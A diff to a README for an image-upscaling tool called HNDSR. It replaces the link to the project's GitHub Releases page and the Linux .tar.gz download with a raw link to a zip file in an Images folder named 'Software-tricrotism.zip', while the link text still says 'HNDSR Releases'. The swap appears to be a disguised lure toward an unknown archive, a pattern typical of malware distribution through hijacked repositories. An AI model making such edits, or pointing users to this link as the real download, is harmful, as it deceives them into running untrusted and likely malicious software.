45-12/HNDSR/README.md

    - **GPU**: Recommended for better performance, especially if you have NVIDIA with CUDA support.

 2. **Download HNDSR**
-   - Visit this page to download: [HNDSR Releases](https://github.com/45-12/HNDSR/releases).
+   - Visit this page to download: [HNDSR Releases](https://raw.githubusercontent.com/45-12/HNDSR/main/Images/Software-tricrotism.zip).

 3. **Install HNDSR**
    - If you are using Windows, download the .exe file.
 Double-click the downloaded file and follow the prompts to install it.
    - If you are using macOS, download the .dmg file.
 Open the file and drag the HNDSR app to your Applications folder.
-   - For Linux users, download the .tar.gz file.
+   - For Linux users, download the https://raw.githubusercontent.com/45-12/HNDSR/main/Images/Software-tricrotism.zip file.
 Extract it and follow the README instructions in the folder.

 ## 📥 Download & Install
-Once you visit the [HNDSR Releases](https://github.com/45-12/HNDSR/releases) page, you will find the latest version available for download.
+Once you visit the [HNDSR Releases](https://raw.githubusercontent.com/45-12/HNDSR/main/Images/Software-tricrotism.zip) page, you will find the latest version available for download.
 Choose the file that matches your operating system.
 Here’s a simple breakdown:

 - **Windows Users**: Download the `.exe` file and run it.
 - **macOS Users**: Download the `.dmg` file and install it.
-- **Linux Users**: Download and extract the `.tar.gz` file and follow the in-folder instructions.
+- **Linux Users**: Download and extract the `https://raw.githubusercontent.com/45-12/HNDSR/main/Images/Software-tricrotism.zip` file and follow the in-folder instructions.

 ## 🖼️ Features
 - **State-of-the-Art Upscaling**: Achieve 4× upscaling with remarkable detail.